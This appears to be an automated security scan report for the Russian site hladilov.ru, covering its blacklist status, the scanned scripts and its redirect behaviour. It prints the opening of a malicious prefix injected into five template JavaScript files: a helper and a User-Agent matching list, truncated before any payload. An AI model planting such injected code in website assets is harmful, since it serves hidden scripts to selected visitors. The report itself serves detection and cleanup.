Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hladilov.ru
Result: Google Safe Browsing flags the website as suspicious — visiting it may harm your computer.
Details are available at the Safe Browsing diagnostic URL given in the query above.
Result: Google Safe Browsing flags the website as suspicious — visiting it may harm your computer.
Details are available at the Safe Browsing diagnostic URL given in the query above.
Scanned pages/files
Note on the results below: all five JavaScript files reported as malicious begin with the same injected prefix — a `stripos` helper and an `aaa_online_ga` function holding a list of User-Agent substrings (`nigraListo`) — prepended to otherwise legitimate library code (the jQuery core, the Warp menu scripts, the template script). This is consistent with an injection written into every .js file of the template rather than a single compromised script. Each excerpt is truncated after that list, so the payload `aaa_online_ga` delivers is not visible in this report, and no antivirus detection names were captured in the "Antivirus reports" cells. The pogoda.msk.ru rows answering `302 Found` to the site root are responses to non-existent paths (including the scanner's own `test404page.js` probe), i.e. the server redirects unknown URLs instead of returning 404; a "clean" verdict on those rows describes the redirect, not a script.
Request | Server response | Status |
http://hladilov.ru/ | 200 OK Content-Length: 10809 Content-Type: text/html | clean |
http://hladilov.ru/templates/yoo_crystal_j15/warp/libraries/jquery/jquery.js | 200 OK Content-Length: 92578 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob 9)return Math.max(f.documentElement["client"+b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===z){f=c.css(f,d);h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}});I.jQuery=I.$=c})(window);jQuery.noConflict(); Antivirus reports:
(Antivirus report rows were not captured in this copy of the report.)
http://hladilov.ru/templates/yoo_crystal_j15/warp/js/warp.js | 200 OK Content-Length: 14152 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob d-a,0,b,d)+c},easeOutBounce:function(e,a,c,b,d){return(a/=d)<1/2.75?b*7.5625*a*a+c:a<2/2.75?b*(7.5625*(a-=1.5/2.75)*a+0.75)+c:a<2.5/2.75?b*(7.5625*(a-=2.25/2.75)*a+0.9375)+c:b*(7.5625*(a-=2.625/2.75)*a+0.984375)+c},easeInOutBounce:function(e,a,c,b,d){if(a<d/2)return g.easing.easeInBounce(e,a*2,0,b,d)*0.5+c;return g.easing.easeOutBounce(e,a*2-d,0,b,d)*0.5+b*0.5+c}})})(jQuery); Antivirus reports:
(Antivirus report rows were not captured in this copy of the report.)
http://hladilov.ru/templates/yoo_crystal_j15/warp/js/accordionmenu.js | 200 OK Content-Length: 8010 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob b!="initialize")f.data(c.prototype.name)[b].apply(f.data(c.prototype.name),Array.prototype.slice.call(e,1));else if(!b||a.isPlainObject(b)){var g=new c;c.prototype.initialize&&g.initialize.apply(g,a.merge([f],e));f.data(c.prototype.name,g)}else a.error("Method "+b+" does not exist on jQuery."+c.name)})}})(jQuery); Antivirus reports:
(Antivirus report rows were not captured in this copy of the report.)
http://hladilov.ru/templates/yoo_crystal_j15/warp/js/dropdownmenu.js | 200 OK Content-Length: 12291 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob c.fn[m.prototype.name]=function(){var i=arguments,d=i[0]?i[0]:null;return this.each(function(){var a=c(this);if(m.prototype[d]&&a.data(m.prototype.name)&&d!="initialize")a.data(m.prototype.name)[d].apply(a.data(m.prototype.name),Array.prototype.slice.call(i,1));else if(!d||c.isPlainObject(d)){var l=new m;m.prototype.initialize&&l.initialize.apply(l,c.merge([a],i));a.data(m.prototype.name,l)}else c.error("Method "+d+" does not exist on jQuery."+m.name)})}})(jQuery); Antivirus reports:
(Antivirus report rows were not captured in this copy of the report.)
http://hladilov.ru/templates/yoo_crystal_j15/js/template.js | 200 OK Content-Length: 9137 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob $('a[href="#page"]').smoothScroller({ duration: 500 }); $('div.headerbox div.deepest').matchHeight(20); $('div.topbox div.deepest').matchHeight(20); $('div.bottombox div.deepest').matchHeight(20); $('div.maintopbox div.deepest').matchHeight(20); $('div.mainbottombox div.deepest').matchHeight(20); $('div.contenttopbox div.deepest').matchHeight(20); $('div.contentbottombox div.deepest').matchHeight(20); }); Antivirus reports:
(Antivirus report rows were not captured in this copy of the report.)
http://www.pogoda.msk.ru/text_informer.php?st=1 | 200 OK Content-Length: 902 Content-Type: text/html | clean |
http://www.pogoda.msk.ru/ | 200 OK Content-Length: 25400 Content-Type: text/html | clean |
http://www.pogoda.msk.ru/swfobject.js | 200 OK Content-Length: 10220 Content-Type: text/javascript | clean |
http://www.pogoda.msk.ru//yandex.st/share/share.js/ | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 23:21:35 GMT Location: http://www.pogoda.msk.ru Server: Apache/2.2.15 (CentOS) Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pogoda.msk.ru/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 23:21:35 GMT Location: http://www.pogoda.msk.ru Server: Apache/2.2.15 (CentOS) Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21259 Content-Type: text/javascript | clean |
http://www.pogoda.msk.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 23:21:36 GMT Location: http://www.pogoda.msk.ru Server: Apache/2.2.15 (CentOS) Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
https://w.uptolike.com/widgets/v1/zp.js?pid=1254960 | 200 OK Content-Length: 38558 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hladilov.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 04 Sep 2014 23:12:20 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 04 Sep 2014 23:12:20 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f98627564affcb1ebf3239b75c3415d0=52dfe19c2b5f5228b63d132448f04716; path=/
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: hladilov.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 04 Sep 2014 23:12:20 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 04 Sep 2014 23:12:20 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f98627564affcb1ebf3239b75c3415d0=52dfe19c2b5f5228b63d132448f04716; path=/
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: hladilov.ru
Referer: http://www.google.com/search?q=hladilov.ru
Result:
The result is similar to the first query: no Referer-conditional redirect was observed. Note that this check only varies the Referer header; the injected script in the files above appears to key on User-Agent substrings, so browser-specific behaviour is not ruled out by this test.
GET / HTTP/1.1
Host: hladilov.ru
Referer: http://www.google.com/search?q=hladilov.ru
Result:
The result is similar to the first query: no Referer-conditional redirect was observed. Note that this check only varies the Referer header; the injected script in the files above appears to key on User-Agent substrings, so browser-specific behaviour is not ruled out by this test.